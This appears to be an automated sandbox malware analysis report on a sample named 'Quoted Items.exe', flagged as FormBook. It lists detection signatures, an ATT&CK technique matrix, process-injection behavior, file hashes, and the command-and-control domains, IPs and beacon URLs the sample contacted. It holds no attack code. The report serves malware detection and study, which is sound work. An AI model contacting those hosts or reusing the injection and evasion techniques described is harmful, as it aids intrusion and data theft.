          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626564 Sample: Quoted Items.exe Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 31 www.zhouyihong.top 2->31 33 www.ivyleaguereading.com 2->33 35 www.quinten-and-sam.com 2->35 43 Snort IDS alert for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 9 other signatures 2->49 11 Quoted Items.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\Quoted Items.exe.log, ASCII 11->29 dropped 61 Injects a PE file into a foreign processes 11->61 15 Quoted Items.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.royaltortoisecookieco.online 209.17.116.163, 49806, 80 DEFENSE-NETUS United States 18->37 39 www.zhouyihong.top 180.76.158.103, 80 BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd China 18->39 41 2 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cmstp.exe 12 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Quoted Items.exe45%VirustotalBrowse
          Quoted Items.exe49%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Quoted Items.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.Quoted Items.exe.cb0000.2.unpack100%AviraHEUR/AGEN.1234539Download File
          4.0.Quoted Items.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.Quoted Items.exe.d44790.3.unpack100%AviraHEUR/AGEN.1234539Download File
          16.2.cmstp.exe.1230000.0.unpack100%AviraHEUR/AGEN.1234539Download File
          4.0.Quoted Items.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.Quoted Items.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          16.0.cmstp.exe.1230000.0.unpack100%AviraHEUR/AGEN.1234539Download File
          4.0.Quoted Items.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          ghs.googlehosted.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.zhouyihong.top/gfge/?-ZEhG=0pO83p&atm=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIf0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.royaltortoisecookieco.online/gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          https://www.gratitudeaddict.com/0%Avira URL Cloudsafe
          http://www.gratefulgrandmas.com/gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.gulabmonga.com/gfge/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.zhouyihong.top
          		180.76.158.103
          		truetrue
            		unknown
            www.quinten-and-sam.com
            		3.93.205.129
            		truefalse
              		unknown
              www.royaltortoisecookieco.online
              		209.17.116.163
              		truetrue
                		unknown
                ghs.googlehosted.com
                		172.217.168.19
                		truefalseunknown
                www.gratefulgrandmas.com
                		unknown
                		unknowntrue
                  		unknown
                  www.ivyleaguereading.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.royaltortoisecookieco.online/gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.gratefulgrandmas.com/gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83pfalse
                    • Avira URL Cloud: malware
                    		unknown
                    www.gulabmonga.com/gfge/true
                    • Avira URL Cloud: malware
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.comQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.tiro.comQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhouyihong.top/gfge/?-ZEhG=0pO83p&atm=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIfcmstp.exe, 00000010.00000002.515589194.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515718507.00000000033FF000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515691938.00000000033F2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.krQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.gratitudeaddict.com/cmstp.exe, 00000010.00000002.517155525.0000000005762000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fonts.comQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comQuoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        180.76.158.103
                                        		www.zhouyihong.topChina
                                        		38365BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdtrue
                                        172.217.168.19
                                        		ghs.googlehosted.comUnited States
                                        		15169GOOGLEUSfalse
                                        209.17.116.163
                                        		www.royaltortoisecookieco.onlineUnited States
                                        		55002DEFENSE-NETUStrue

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:626564
                                        Start date and time: 14/05/202213:10:242022-05-14 13:10:24 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 17s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Quoted Items.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:27
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/1@6/3
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 30.6% (good quality ratio 28.4%)
                                        • Quality average: 72%
                                        • Quality standard deviation: 31%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Adjust boot time
                                        • Enable AMSI

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        13:11:37API Interceptor2x Sleep call for process: Quoted Items.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quoted Items.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\Quoted Items.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1308
                                        Entropy (8bit):5.345811588615766
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                        MD5:2E016B886BDB8389D2DD0867BE55F87B
                                        SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                        SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                        SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.721861373170072
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Quoted Items.exe
                                        File size:640512
                                        MD5:901567a408d891fc0f67e15221d1b7e4
                                        SHA1:dba16ac8c7523f640494843471a5f9d4fb211bef
                                        SHA256:70c9cf50b937cdf3015d4e7fdffbe1c8ab4820eaca74c7373f0760fa905a494a
                                        SHA512:8399655a069d6553e93d6e80c3b8c62f4de3a2d6335e2a130f2e6551966c5e490c752521f63533d7c3e8aedf5e38ec6588164c053798174d5928a5078fa475d4
                                        SSDEEP:12288:F/TbPzuVYafMeY0h5JOH/XVQcUcpNa1AOcCrV1tDOrbdYshB5d:xLFaEX5H/XQt1/h18b2shR
                                        TLSH:D5D4F07CF5E38E21C3291676C4D368100B714E26E7B3E39F2B4691EA5D02BD74985B8B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}b..............0......@........... ........@.. ....................... ............@................................

                                        File Icon

                                        Icon Hash:d4a8989ae8ccb6cc

                                        Static PE Info

                                        General

                                        Entrypoint:0x49a2be
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
